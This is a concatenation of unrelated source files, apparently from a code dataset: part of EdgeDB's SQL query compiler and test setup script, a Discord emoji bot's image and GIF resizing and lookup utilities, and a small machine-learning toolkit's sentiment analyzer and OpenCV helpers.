squery = source.query
if astutils.is_set_op_query(squery):
# Set op query
source_qs = [squery, squery.larg, squery.rarg]
else:
source_qs = [squery]
for source_q in source_qs:
s_paths = set()
if hasattr(source_q, 'value_scope'):
s_paths.update((p, 'value') for p in source_q.value_scope)
if hasattr(source_q, 'path_outputs'):
s_paths.update(source_q.path_outputs)
if hasattr(source_q, 'path_namespace'):
s_paths.update(source_q.path_namespace)
if hasattr(source_q, 'path_rvar_map'):
s_paths.update(source_q.path_rvar_map)
view_path_id_map = getattr(source_q, 'view_path_id_map', {})
for path_id, aspect in s_paths:
path_id = pathctx.reverse_map_path_id(path_id, view_path_id_map)
if path_id in source.query.path_id_mask:
continue
rvar = maybe_get_path_rvar(target, path_id, aspect=aspect, ctx=ctx)
if rvar is None:
pathctx.put_path_rvar(
target, path_id, source, aspect=aspect, env=ctx.env)
def find_rvar(
stmt: pgast.Query, *,
source_stmt: typing.Optional[pgast.Query]=None,
path_id: irast.PathId,
ctx: context.CompilerContextLevel) -> \
typing.Optional[pgast.BaseRangeVar]:
"""Find an existing range var for a given *path_id* in stmt hierarchy.
If a range var is visible in a given SQL scope denoted by *stmt*, or,
optionally, *source_stmt*, record it on *stmt* for future reference.
:param stmt:
The statement to ensure range var visibility in.
:param source_stmt:
An optional statement object which is used as the starting SQL scope
for range var search. If not specified, *stmt* is used as the
starting scope.
:param path_id:
The path ID of the range var being searched.
:param ctx:
Compiler context.
:return:
A range var instance if found, ``None`` otherwise.
"""
if source_stmt is None:
source_stmt = stmt
rvar = maybe_get_path_rvar(source_stmt, path_id=path_id,
aspect='value', ctx=ctx)
if rvar is not None:
pathctx.put_path_rvar_if_not_exists(
stmt, path_id, rvar, aspect='value', env=ctx.env)
src_rvar = maybe_get_path_rvar(source_stmt, path_id=path_id,
aspect='source', ctx=ctx)
if src_rvar is not None:
pathctx.put_path_rvar_if_not_exists(
stmt, path_id, src_rvar, aspect='source', env=ctx.env)
return rvar
def include_rvar(
stmt: pgast.Query, rvar: pgast.BaseRangeVar,
path_id: irast.PathId, *,
overwrite_path_rvar: bool=False,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
"""Ensure that *rvar* is visible in *stmt* as a value/source aspect.
    :param stmt:
        The statement to include *rvar* in.
    :param rvar:
        The range var node to join.
    :param path_id:
        The path ID of *rvar*.
    :param overwrite_path_rvar:
        If *True*, overwrite any existing path rvar record for *path_id*.
    :param ctx:
        Compiler context.
"""
if path_id.is_objtype_path():
aspects = ['source', 'value']
else:
aspects = ['value']
return include_specific_rvar(
stmt, rvar=rvar, path_id=path_id,
overwrite_path_rvar=overwrite_path_rvar,
aspects=aspects, ctx=ctx)
def include_specific_rvar(
stmt: pgast.Query, rvar: pgast.BaseRangeVar,
path_id: irast.PathId, *,
overwrite_path_rvar: bool=False,
aspects: typing.Iterable[str]=('value',),
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
"""Make the *aspect* of *path_id* visible in *stmt* as *rvar*.
    :param stmt:
        The statement to include *rvar* in.
    :param rvar:
        The range var node to join.
    :param path_id:
        The path ID of *rvar*.
    :param overwrite_path_rvar:
        If *True*, overwrite any existing path rvar record for *path_id*.
    :param aspects:
        The reference aspects of the range var.
    :param ctx:
        Compiler context.
"""
if not has_rvar(stmt, rvar, ctx=ctx):
rel_join(stmt, rvar, ctx=ctx)
# Make sure that the path namespace of *cte* is mapped
# onto the path namespace of *stmt*.
pull_path_namespace(target=stmt, source=rvar, ctx=ctx)
for aspect in aspects:
if overwrite_path_rvar:
pathctx.put_path_rvar(
stmt, path_id, rvar, aspect=aspect, env=ctx.env)
else:
pathctx.put_path_rvar_if_not_exists(
stmt, path_id, rvar, aspect=aspect, env=ctx.env)
return rvar
def has_rvar(
stmt: pgast.Query, rvar: pgast.BaseRangeVar, *,
ctx: context.CompilerContextLevel) -> bool:
while stmt is not None:
if pathctx.has_rvar(stmt, rvar, env=ctx.env):
return True
stmt = ctx.rel_hierarchy.get(stmt)
return False
def _get_path_rvar(
stmt: pgast.Query, path_id: irast.PathId, *,
aspect: str, ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
qry = stmt
while qry is not None:
rvar = pathctx.maybe_get_path_rvar(
qry, path_id, aspect=aspect, env=ctx.env)
if rvar is not None:
if qry is not stmt:
# Cache the rvar reference.
pathctx.put_path_rvar(stmt, path_id, rvar, aspect=aspect,
env=ctx.env)
return rvar, path_id
if qry.view_path_id_map:
path_id = pathctx.reverse_map_path_id(
path_id, qry.view_path_id_map)
qry = ctx.rel_hierarchy.get(qry)
raise LookupError(
f'there is no range var for {path_id} in {stmt}')
def get_path_rvar(
stmt: pgast.Query, path_id: irast.PathId, *,
aspect: str, ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
rvar, _ = _get_path_rvar(stmt, path_id, aspect=aspect, ctx=ctx)
return rvar
def get_path_var(
stmt: pgast.Query, path_id: irast.PathId, *,
aspect: str, ctx: context.CompilerContextLevel) -> pgast.OutputVar:
var = pathctx.maybe_get_path_var(
stmt, path_id=path_id, aspect=aspect, env=ctx.env)
if var is not None:
return var
else:
rvar, path_id = _get_path_rvar(stmt, path_id, aspect=aspect, ctx=ctx)
return pathctx.get_rvar_path_var(
rvar, path_id, aspect=aspect, env=ctx.env)
def maybe_get_path_rvar(
stmt: pgast.Query, path_id: irast.PathId, *,
aspect: str, ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
try:
return get_path_rvar(stmt, path_id, aspect=aspect, ctx=ctx)
except LookupError:
return None
def maybe_get_path_var(
stmt: pgast.Query, path_id: irast.PathId, *,
aspect: str, ctx: context.CompilerContextLevel) -> pgast.OutputVar:
try:
rvar, path_id = _get_path_rvar(stmt, path_id, aspect=aspect, ctx=ctx)
except LookupError:
return None
else:
try:
return pathctx.get_rvar_path_var(
rvar, path_id, aspect=aspect, env=ctx.env)
except LookupError:
return None
def new_empty_rvar(
ir_set: irast.EmptySet, *,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
nullrel = pgast.NullRelation(path_id=ir_set.path_id)
rvar = dbobj.rvar_for_rel(nullrel, env=ctx.env)
rvar.path_scope.add(ir_set.path_id)
rvar.value_scope.add(ir_set.path_id)
return rvar
def new_root_rvar(
ir_set: irast.Set, *,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
if not isinstance(ir_set.scls, s_objtypes.ObjectType):
raise ValueError('cannot create root rvar for non-object path')
set_rvar = dbobj.range_for_set(ir_set, env=ctx.env)
set_rvar.path_scope.add(ir_set.path_id)
set_rvar.value_scope.add(ir_set.path_id)
if ir_set.rptr and ir_set.rptr.is_inbound:
ptrcls = ir_set.rptr.ptrcls
ptr_info = pg_types.get_pointer_storage_info(
ptrcls, resolve_type=False, link_bias=False)
if ptr_info.table_type == 'ObjectType':
# Inline link
rref = dbobj.get_column(None, ptr_info.column_name,
nullable=not ptrcls.required)
set_rvar.path_scope.add(ir_set.path_id.src_path())
pathctx.put_rvar_path_output(
set_rvar, ir_set.path_id.src_path(),
aspect='identity', var=rref, env=ctx.env)
return set_rvar
def new_poly_rvar(
ir_set: irast.Set, *,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
rvar = new_root_rvar(ir_set, ctx=ctx)
rvar.path_scope.add(ir_set.path_id.src_path())
return rvar
def new_pointer_rvar(
ir_ptr: irast.Pointer, *,
link_bias: bool=False,
src_rvar: pgast.BaseRangeVar,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
ptrcls = ir_ptr.ptrcls
ptr_info = pg_types.get_pointer_storage_info(
ptrcls, resolve_type=False, link_bias=link_bias)
if ptr_info.table_type == 'ObjectType':
# Inline link
return _new_inline_pointer_rvar(
ir_ptr, ptr_info=ptr_info,
src_rvar=src_rvar, ctx=ctx)
else:
return _new_mapped_pointer_rvar(ir_ptr, ctx=ctx)
def _new_inline_pointer_rvar(
ir_ptr: irast.Pointer, *,
lateral: bool=True,
ptr_info: pg_types.PointerStorageInfo,
src_rvar: pgast.BaseRangeVar,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
ptr_rel = pgast.SelectStmt()
ptr_rvar = dbobj.rvar_for_rel(ptr_rel, lateral=lateral, env=ctx.env)
ptr_rvar.query.path_id = ir_ptr.target.path_id.ptr_path()
is_inbound = ir_ptr.direction == s_pointers.PointerDirection.Inbound
if is_inbound:
far_pid = ir_ptr.source.path_id
else:
far_pid = ir_ptr.target.path_id
far_ref = pathctx.get_rvar_path_identity_var(
src_rvar, far_pid, env=ctx.env)
ptr_rvar.path_scope.add(far_pid)
pathctx.put_path_identity_var(ptr_rel, far_pid, var=far_ref, env=ctx.env)
return ptr_rvar
def _new_mapped_pointer_rvar(
ir_ptr: irast.Pointer, *,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
ptrcls = ir_ptr.ptrcls
ptr_rvar = dbobj.range_for_pointer(ir_ptr, env=ctx.env)
# Set up references according to the link direction.
if isinstance(ptrcls, s_links.Link):
# XXX: fix this once Properties are Sources
src_ptr_info = pg_types.get_pointer_storage_info(
ptrcls.getptr(ctx.env.schema, 'std::source'), resolve_type=False)
src_col = src_ptr_info.column_name
else:
src_col = common.edgedb_name_to_pg_name('std::source')
source_ref = dbobj.get_column(None, src_col, nullable=False)
if isinstance(ptrcls, s_links.Link):
# XXX: fix this once Properties are Sources
tgt_ptr_info = pg_types.get_pointer_storage_info(
ptrcls.getptr(ctx.env.schema, 'std::target'), resolve_type=False)
tgt_col = tgt_ptr_info.column_name
else:
tgt_col = common.edgedb_name_to_pg_name('std::target')
target_ref = dbobj.get_column(None, tgt_col, nullable=not ptrcls.required)
if ir_ptr.direction == s_pointers.PointerDirection.Inbound:
near_ref = target_ref
far_ref = source_ref
else:
near_ref = source_ref
far_ref = target_ref
ptr_rvar.query.path_id = ir_ptr.target.path_id.ptr_path()
ptr_rvar.path_scope.add(ptr_rvar.query.path_id)
src_pid = ir_ptr.source.path_id
tgt_pid = ir_ptr.target.path_id
ptr_rvar.path_scope.add(src_pid)
pathctx.put_rvar_path_output(ptr_rvar, src_pid, aspect='identity',
var=near_ref, env=ctx.env)
pathctx.put_rvar_path_output(ptr_rvar, src_pid, aspect='value',
var=near_ref, env=ctx.env)
pathctx.put_rvar_path_output(ptr_rvar, tgt_pid, aspect='value',
var=far_ref, env=ctx.env)
if tgt_pid.is_objtype_path():
ptr_rvar.path_scope.add(tgt_pid)
pathctx.put_rvar_path_output(ptr_rvar, tgt_pid, aspect='identity',
var=far_ref, env=ctx.env)
return ptr_rvar
def new_rel_rvar(
ir_set: irast.Set, stmt: pgast.Query, *,
lateral: bool=True,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
if irutils.is_scalar_view_set(ir_set):
ensure_bond_for_expr(ir_set, stmt, ctx=ctx)
return dbobj.rvar_for_rel(stmt, lateral=lateral, env=ctx.env)
def new_static_class_rvar(
ir_set: irast.Set, *,
lateral: bool=True,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
set_rvar = new_root_rvar(ir_set, ctx=ctx)
clsname = pgast.Constant(val=ir_set.rptr.source.scls.material_type().name)
nameref = dbobj.get_column(
set_rvar, common.edgedb_name_to_pg_name('schema::name'),
nullable=False)
condition = astutils.new_binop(nameref, clsname, op='=')
substmt = pgast.SelectStmt()
include_rvar(substmt, set_rvar, ir_set.path_id, ctx=ctx)
substmt.where_clause = astutils.extend_binop(
substmt.where_clause, condition)
return new_rel_rvar(ir_set, substmt, ctx=ctx)
def semi_join(
stmt: pgast.Query, ir_set: irast.Set, src_rvar: pgast.BaseRangeVar, *,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
"""Join an IR Set using semi-join."""
rptr = ir_set.rptr
ptrcls = rptr.ptrcls
ptr_info = pg_types.get_pointer_storage_info(
ptrcls, resolve_type=False, link_bias=False)
is_inline_ref = ptr_info.table_type == 'ObjectType'
# Target set range.
set_rvar = new_root_rvar(ir_set, ctx=ctx)
# Link range.
map_rvar = new_pointer_rvar(rptr, src_rvar=src_rvar, ctx=ctx)
# Target identity in the target range.
if rptr.is_inbound and is_inline_ref:
tgt_pid = ir_set.path_id.extend(ptrcls)
else:
tgt_pid = ir_set.path_id
tgt_ref = pathctx.get_rvar_path_identity_var(
set_rvar, tgt_pid, env=ctx.env)
include_rvar(
ctx.rel, map_rvar,
path_id=ir_set.path_id.ptr_path(), ctx=ctx)
pathctx.get_path_identity_output(ctx.rel, ir_set.path_id, env=ctx.env)
cond = astutils.new_binop(tgt_ref, ctx.rel, 'IN')
stmt.where_clause = astutils.extend_binop(
stmt.where_clause, cond)
return set_rvar
def ensure_source_rvar(
ir_set: irast.Set, stmt: pgast.Query, *,
ctx: context.CompilerContextLevel) \
-> pgast.BaseRangeVar:
rvar = maybe_get_path_rvar(stmt, ir_set.path_id, aspect='source', ctx=ctx)
if rvar is None:
scope_stmt = maybe_get_scope_stmt(ir_set.path_id, ctx=ctx)
if scope_stmt is None:
scope_stmt = ctx.rel
rvar = new_root_rvar(ir_set, ctx=ctx)
include_rvar(scope_stmt, rvar, path_id=ir_set.path_id, ctx=ctx)
return rvar
def ensure_bond_for_expr(
ir_set: irast.Set, stmt: pgast.Query, *, type='int',
ctx: context.CompilerContextLevel) -> None:
if ir_set.path_id.is_objtype_path():
# ObjectTypes have inherent identity
return
ensure_transient_identity_for_set(ir_set, stmt, type=type, ctx=ctx)
def ensure_transient_identity_for_set(
ir_set: irast.Set, stmt: pgast.Query, *,
ctx: context.CompilerContextLevel, type='int') -> None:
if type == 'uuid':
id_expr = pgast.FuncCall(
name=('edgedb', 'uuid_generate_v1mc',),
args=[],
)
else:
id_expr = pgast.FuncCall(
name=('row_number',),
args=[],
over=pgast.WindowDef()
)
pathctx.put_path_identity_var(stmt, ir_set.path_id,
id_expr, force=True, env=ctx.env)
pathctx.put_path_bond(stmt, ir_set.path_id)
def get_scope(
ir_set: irast.Set, *,
ctx: context.CompilerContextLevel) -> \
typing.Optional[irast.ScopeTreeNode]:
if ir_set.path_scope_id is None:
return None
else:
return ctx.scope_tree.root.find_by_unique_id(ir_set.path_scope_id)
def update_scope(
ir_set: irast.Set, stmt: pgast.Query, *,
ctx: context.CompilerContextLevel) -> None:
scope_tree = get_scope(ir_set, ctx=ctx)
if scope_tree is None:
return
ctx.scope_tree = scope_tree
ctx.path_scope = ctx.path_scope.new_child()
ctx.path_scope.update({p.path_id: stmt for p in scope_tree.path_children})
for child_path in scope_tree.get_all_paths():
parent_scope = scope_tree.parent
if parent_scope is None or not parent_scope.is_visible(child_path):
stmt.path_id_mask.add(child_path)
def get_scope_stmt(
path_id: irast.PathId, *,
ctx: context.CompilerContextLevel) -> pgast.Query:
stmt = ctx.path_scope.get(path_id)
if stmt is None and path_id.is_ptr_path():
stmt = ctx.path_scope.get(path_id.tgt_path())
if stmt is None:
raise LookupError(f'cannot find scope statement for {path_id}')
return stmt
def maybe_get_scope_stmt(
path_id: irast.PathId, *,
ctx: context.CompilerContextLevel) -> typing.Optional[pgast.Query]:
try:
return get_scope_stmt(path_id, ctx=ctx)
except LookupError:
return None
def rel_join(
query: pgast.Query, right_rvar: pgast.BaseRangeVar, *,
ctx: context.CompilerContextLevel) -> None:
condition = None
for path_id in right_rvar.path_scope:
lref = maybe_get_path_var(query, path_id, aspect='identity', ctx=ctx)
if lref is None:
lref = maybe_get_path_var(query, path_id, aspect='value', ctx=ctx)
if lref is None:
continue
rref = pathctx.get_rvar_path_identity_var(
right_rvar, path_id, env=ctx.env)
path_cond = astutils.join_condition(lref, rref)
condition = astutils.extend_binop(condition, path_cond)
if condition is None:
join_type = 'cross'
else:
join_type = 'inner'
if not query.from_clause:
query.from_clause.append(right_rvar)
if condition is not None:
query.where_clause = astutils.extend_binop(
query.where_clause, condition)
else:
larg = query.from_clause[0]
rarg = right_rvar
query.from_clause[0] = pgast.JoinExpr(
type=join_type, larg=larg, rarg=rarg, quals=condition)
if join_type == 'left':
right_rvar.nullable = True
if not right_rvar.is_distinct:
query.is_distinct = False
```
#### File: edgedb/tests/initlocal.py
```python
import argparse
import os.path
import shutil
import sys
import unittest
from edb.server import cluster as edgedb_cluster
from edb.server import _testbase as tb
class TestResult:
def wasSuccessful(self):
return True
class TestRunner:
def __init__(self):
self.cases = set()
def run(self, test):
self.cases.update(tb.get_test_cases([test]))
return TestResult()
def execute(tests_dir, conns):
runner = TestRunner()
unittest.main(
module=None,
argv=['unittest', 'discover', '-s', tests_dir],
testRunner=runner, exit=False)
tb.setup_test_cases(runner.cases, conns)
def die(msg):
print(f'FATAL: {msg}', file=sys.stderr)
sys.exit(1)
def parse_connect_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-D', '--data-dir', type=str,
default=os.path.join(os.environ['HOME'], '.edgedb'),
help='database cluster directory (default ~/.edgedb)')
parser.add_argument(
'-s', '--start-directory', type=str,
help='directory to start test discovery from')
parser.add_argument(
'-j', '--jobs', type=int,
help='number of parallel processes to use (defaults to CPU count)')
args = parser.parse_args()
if args.start_directory:
testsdir = args.start_directory
else:
testsdir = os.path.abspath(os.path.dirname(__file__))
return testsdir, args.data_dir, args.jobs
def main():
tests_dir, data_dir, jobs = parse_connect_args()
if os.path.exists(data_dir):
if not os.path.isdir(data_dir):
die(f'{data_dir!r} exists and is not a directory')
if os.listdir(data_dir):
die(f'{data_dir!r} exists and is not empty')
if not jobs:
jobs = os.cpu_count()
cluster = edgedb_cluster.Cluster(data_dir)
print(f'Bootstrapping test EdgeDB instance in {data_dir}...')
try:
cluster.init()
cluster.start(port='dynamic', timezone='UTC')
except BaseException:
if os.path.exists(data_dir):
shutil.rmtree(data_dir)
raise
servers, conns = tb.start_worker_servers(cluster, num_workers=jobs)
destroy_cluster = False
try:
execute(tests_dir, conns)
print(f'Initialized and populated test EdgeDB instance in {data_dir}')
except BaseException:
destroy_cluster = True
raise
finally:
tb.shutdown_worker_servers(servers, destroy=destroy_cluster)
if __name__ == '__main__':
main()
``` |
{
"source": "1st-award/emojiBot",
"score": 3
} |
#### File: 1st-award/emojiBot/GIFConvert.py
```python
from PIL import Image
class ResizeFrame:
def __init__(self, length, gif, scale, actual_frames):
self.current = 0
self.stop = length
self.gif = gif
self.scale = scale
self.actual_frames = actual_frames
    def __aiter__(self):
return self
async def __anext__(self):
print(f"run async for... current {self.current} until {self.stop}")
if self.current < self.stop:
            self.gif.seek(self.actual_frames[self.current])
            new_frame = Image.new('RGBA', self.gif.size)
            new_frame.paste(self.gif)
            # Image.thumbnail() resizes in place and returns None, so return the frame itself
            new_frame.thumbnail(self.scale, Image.ANTIALIAS)
            self.current += 1
            return new_frame
else:
raise StopAsyncIteration
def scale_gif(path, scale, new_path=None):
gif = Image.open(path)
if not new_path:
new_path = path
old_gif_information = {
'loop': bool(gif.info.get('loop', 1)),
'duration': gif.info.get('duration', 40),
'background': gif.info.get('background', 223),
'extension': gif.info.get('extension', (b'NETSCAPE2.0')),
'transparency': gif.info.get('transparency', 223)
}
new_frames = get_new_frames(gif, scale)
save_new_gif(new_frames, old_gif_information, new_path)
def get_new_frames(gif, scale):
new_frames = []
actual_frames = gif.n_frames
for frame in range(actual_frames):
gif.seek(frame)
new_frame = Image.new('RGBA', gif.size)
new_frame.paste(gif)
new_frame.thumbnail(scale, Image.ANTIALIAS)
new_frames.append(new_frame)
return new_frames
def save_new_gif(new_frames, old_gif_information, new_path):
new_frames[0].save(new_path,
save_all=True,
append_images=new_frames[1:],
duration=old_gif_information['duration'],
loop=old_gif_information['loop'],
background=old_gif_information['background'],
extension=old_gif_information['extension'],
transparency=old_gif_information['transparency'])
```
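A minimal usage sketch for `scale_gif` above, assuming a GIF already exists at the given path; the file paths and sizes here are placeholders rather than values taken from the bot:

```python
# Hypothetical usage of the helper defined above; paths are placeholders.
from GIFConvert import scale_gif

# Overwrite the original in place with a 128x128 thumbnail.
scale_gif('Emoji/1234/party.gif', (128, 128))

# Or keep the original and write the downscaled copy to a new path.
scale_gif('Emoji/1234/party.gif', (96, 96), new_path='Emoji/1234/party_small.gif')
```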
#### File: 1st-award/emojiBot/GuildEmojiUtil.py
```python
import SQLUtil
# global index
guild_emoji_list = []
# Looks up the emoji file name for a given emoji command.
class SearchEmojiFileName:
def __init__(self, length, emoji_tuple_list, emoji_command):
self.current = 0
self.stop = length
self.emoji_tuple_list = emoji_tuple_list
self.emoji_command = emoji_command
self.emoji_file_name = None
def __aiter__(self):
return self
async def __anext__(self):
print(f"run async for... current {self.current} until {self.stop}")
if self.current < self.stop:
print(self.emoji_tuple_list[self.current][1], self.emoji_command)
if self.emoji_tuple_list[self.current][1] == self.emoji_command:
print("match!")
self.emoji_file_name = self.emoji_tuple_list[self.current][0]
self.current += 1
return self.emoji_file_name
else:
raise StopAsyncIteration
# Returns the matching GuildEmoji instance from guild_emoji_list.
class SearchGuildClass:
def __init__(self, length, guild_list, guildID):
self.current = 0
self.stop = length
self.guild_list = guild_list
self.guildID = guildID
def __aiter__(self):
return self
async def __anext__(self):
print(f"run async for... current {self.current} until {self.stop}")
if self.current < self.stop:
if self.guild_list[self.current].guildID == self.guildID:
return self.guild_list[self.current]
self.current += 1
return None
else:
raise StopAsyncIteration
# Class that loads a guild's emoji stored in the DB into memory
class GuildEmoji:
def __init__(self, _guildID: int, _global_emoji_list):
print(f"new guild emoji class {_guildID}...")
self.guildID = _guildID
print("load guild emoji command")
self.emoji_tuple_list = SQLUtil.emoji_search_all(_guildID)
self.emoji_tuple_list.extend(_global_emoji_list)
print(self.guildID, self.emoji_tuple_list)
    # Return the emoji file for a given emoji command.
async def emoji_search(self, emoji_command: str):
async for emoji in SearchEmojiFileName(len(self.emoji_tuple_list), self.emoji_tuple_list, emoji_command):
print("result", emoji)
if emoji is not None:
return emoji
return None
    # Synchronize with the DB
def update_emoji_list(self):
self.emoji_tuple_list = SQLUtil.emoji_search_all(self.guildID)
# Return the GuildEmoji instance in guild_emoji_list whose guildID matches
async def get_guild_class(_guildID: int):
async for guild_class in SearchGuildClass(len(guild_emoji_list), guild_emoji_list, _guildID):
print("result", guild_class)
if guild_class is not None:
return guild_class
return None
```
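A hedged usage sketch (not from the repository): it assumes `SQLUtil` and its database are configured so the module imports cleanly, and the guild ID and emoji command below are invented values.
```python
import asyncio
import GuildEmojiUtil

async def demo():
    # Scan the in-memory guild list for a cached GuildEmoji instance.
    guild = await GuildEmojiUtil.get_guild_class(1234)    # placeholder guild ID
    if guild is not None:
        filename = await guild.emoji_search("smile")      # placeholder command
        print(filename)

asyncio.run(demo())
```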
#### File: 1st-award/emojiBot/ImojiUtil.py
```python
import discord
import GIFConvert
import os
import shutil
from PIL import Image
async def emoji_save(_emoji: discord.Attachment, _guildID: int):
print("emoji save...")
await _emoji.save(f"Emoji/{_guildID}/{_emoji.filename}")
print("emoji save complete")
if not _emoji.filename.endswith(".gif"):
emoji_resize_normal(_emoji.filename, _guildID)
else:
emoji_resize_gif(_emoji.filename, _guildID)
def emoji_remove(_emoji_filename: str, _guildID: int):
print("emoji remove...")
os.remove(f"Emoji/{_guildID}/{_emoji_filename}")
print("emoji remove complete...")
def emoji_dir_remove(_guildID: int):
print(f"removing emoji dir {_guildID}...")
shutil.rmtree(f"Emoji/{_guildID}")
print(f"remove {_guildID} complete")
# TODO: regular images can also exceed 3MB after conversion, so add a function that checks for this
def emoji_resize_normal(_emoji_filename: str, _guildID: int):
print(f"normal resizing {_emoji_filename}...")
img = Image.open(f'Emoji/{_guildID}/{_emoji_filename}')
img_resize = img.resize((int(128), int(128)))
img_resize.save(f'Emoji/{_guildID}/{_emoji_filename}')
print(f"normal resizing {_emoji_filename} complete...")
# TODO: as noted above, images can exceed 3MB after conversion; add that check, then remove the if checks below and clean up this code
# Cases: 1. high resolution but small file size  2. low resolution but large file size
def emoji_resize_gif(_emoji_filename: str, _guildID: int):
print(f"gif resizing {_emoji_filename}...")
im = Image.open(f'Emoji/{_guildID}/{_emoji_filename}')
file_size = os.stat(f'Emoji/{_guildID}/{_emoji_filename}').st_size / pow(1024, 2)
w_size = im.size[0]
h_size = im.size[1]
print(w_size, h_size)
    # 3MB or less: no resizing needed
    if file_size <= 3:
        return
    # over 3MB: resizing required
    else:
        # large resolution and size -> cap at 350x350
        if w_size > 350 or h_size > 350:
            w_size = h_size = 350
        # resolution at most 350x350 but above the minimum (128x128) -> cap at 128x128
        elif w_size > 128 or h_size > 128:
            w_size = h_size = 128
        # resolution already 128 or below while the size still exceeds 3MB
        else:
            raise ValueError(f"The GIF does not meet the requirements. `Requirements: size (3MB or less), resolution (128X128 or larger)`\n"
                             f"`Uploaded file size: {round(file_size, 2)}MB`\t`Resolution: {w_size}X{h_size}`")
print(w_size, h_size)
GIFConvert.scale_gif(f'Emoji/{_guildID}/{_emoji_filename}', (w_size, h_size))
file_size = os.stat(f'Emoji/{_guildID}/{_emoji_filename}').st_size / pow(1024, 2)
print(f"gif resizing {_emoji_filename} complete... {file_size}MB")
    # the GIF was converted, but its size is still 3MB or more
    if file_size > 3:
        # delete the im variable so the open file handle does not cause a Permission error
        del im
        raise ValueError("The resize succeeded, but the file still does not meet the size requirement.")
def is_support_format(_emoji_filename: str):
support_format_list = ["jpg", "png", "gif"]
for support_format in support_format_list:
if _emoji_filename.endswith(support_format):
return True
    raise NotImplementedError("Unsupported file format.")
``` |
{
"source": "1stDayHack/1stdaykit",
"score": 3
} |
#### File: src/core/base.py
```python
class BaseClass(object):
"""
Inherit from me and follow my structure!
"""
def __init__(self,name,device='cpu'):
self.name = name
self.device = device
def predict(self):
raise NotImplementedError("To be implemented in individual module's script")
def prime(self):
raise NotImplementedError("To be implemented in individual module's script")
def visualize(self):
raise NotImplementedError("To be implemented in individual module's script")
```
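A small illustration of the structure `BaseClass` asks subclasses to follow; `EchoModule` and its behaviour are invented here and are not part of the kit.
```python
# assumes BaseClass from base.py above is in scope
class EchoModule(BaseClass):
    def __init__(self, name="Echo", device="cpu"):
        super().__init__(name, device)

    def predict(self, text):
        # A real module would run inference here; this stub just echoes its input.
        return text

    def prime(self):
        # Nothing to warm up in this toy example.
        pass

    def visualize(self, raw, output):
        print(f"{self.name}: {raw} -> {output}")
```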
#### File: src/core/sentiment.py
```python
import numpy as np
import torch
import matplotlib.pyplot as plt
from pprint import pprint
from transformers import AutoTokenizer, AutoModelWithLMHead, pipeline
from .utils import utils
from .base import BaseClass
class SentimentAnalyzer(BaseClass):
def __init__(self, name='Sentiment Analyzer'): #alt: distilbert-base-uncased-finetuned-sst-2-english
super().__init__(name)
#Init name and metadata
self.name = name
#Create net
# self.tokenizer = AutoTokenizer.from_pretrained("gpt2")
# self.model = AutoModelWithLMHead.from_pretrained("gpt2")
self.predictor = pipeline('sentiment-analysis')
def predict(self,text):
"""
Does sentiment analysis on a given text. In order to perform batch classification,
you can either call this predict() function in a for-loop or alternatively (advanced)
try to modify this predict() function to perform batch-inferencing.
Input:
            text: str object. Text to run sentiment analysis on.
Output:
            predictions: list object. One dict per input with 'label' and 'score'.
"""
#Infer
output = self.predictor(text)
return output
def visualize(self,raw,output):
"""
Simple function to call pretty-print for a neater text representation.
Input:
            raw: list object; original input texts
            output: list object; one dict per text, as returned by predict()
Output:
None
"""
#Print!
for idx,i in enumerate(raw):
pprint({"Raw Text":i,
"Sentiment":output[idx]['label'],
"Confidence":output[idx]['score']})
```
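A short usage sketch, assuming the class is importable from the kit's core package and that the default `transformers` sentiment pipeline can download its weights; the example sentences are made up.
```python
# assumed import, depending on package layout: from core.sentiment import SentimentAnalyzer
analyzer = SentimentAnalyzer()

texts = ["I love this library!", "This is the worst bug I have ever seen."]
results = [analyzer.predict(t)[0] for t in texts]   # one dict per sentence
analyzer.visualize(texts, results)
```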
#### File: core/utils/utils.py
```python
import cv2
import numpy as np
from PIL import Image
"""-------------------------------------------------------------------------------
Helper Classes
-------------------------------------------------------------------------------"""
class MouseSelector():
"""
Helper class that takes an image and spits back out a set of bounding box coordinates
as drawn by the user with a mouse.
"""
def __init__(self):
self.ref_point = []
self.crop = False
def _shape_selection(self, event, x, y, flags, param):
# if the left mouse button was clicked, record the starting
# (x, y) coordinates and indicate that cropping is being performed
if event == cv2.EVENT_LBUTTONDOWN:
self.ref_point = [(x, y)]
# check to see if the left mouse button was released
elif event == cv2.EVENT_LBUTTONUP:
# record the ending (x, y) coordinates and indicate that
# the cropping operation is finished
self.ref_point.append((x, y))
# draw a rectangle around the region of interest
cv2.rectangle(self.image, self.ref_point[0], self.ref_point[1], (0, 255, 0), 2)
cv2.imshow("base image", self.image)
def select(self,image):
#Set image and create window
self.image = image
clone = self.image.copy()
cv2.namedWindow("image")
cv2.setMouseCallback("image", self._shape_selection)
# keep looping until the 'q' key is pressed
while True:
# display the image and wait for a keypress
cv2.imshow("image", self.image)
key = cv2.waitKey(1) & 0xFF
# press 'r' to reset the window
if key == ord("r"):
self.image = clone.copy()
# if the 'c' key is pressed, break from the loop
elif key == ord("c"):
break
if len(self.ref_point) == 2:
crop_img = clone[self.ref_point[0][1]:self.ref_point[1][1], self.ref_point[0][0]:
self.ref_point[1][0]]
cv2.imshow("crop_img", crop_img)
cv2.waitKey(0)
# close all open windows
cv2.destroyAllWindows()
return [self.ref_point[0][1],
self.ref_point[1][1],
self.ref_point[0][0],
self.ref_point[1][0]]
"""-------------------------------------------------------------------------------
Helper Functions
-------------------------------------------------------------------------------"""
def pil_to_cv2(img):
"""
Converts PIL image to cv2 image
"""
img_ = np.array(img)
img_ = img_[:,:,::-1]
return img_
def cv2_to_pil(img):
"""
Converts cv2 image to PIL image
"""
img_ = img[:,:,::-1]
img_ = Image.fromarray(img_)
return img_
``` |
{
"source": "1step6thswmaestro/29",
"score": 3
} |
#### File: project/face_api_server/util.py
```python
import base64
import StringIO
import cStringIO
import urllib
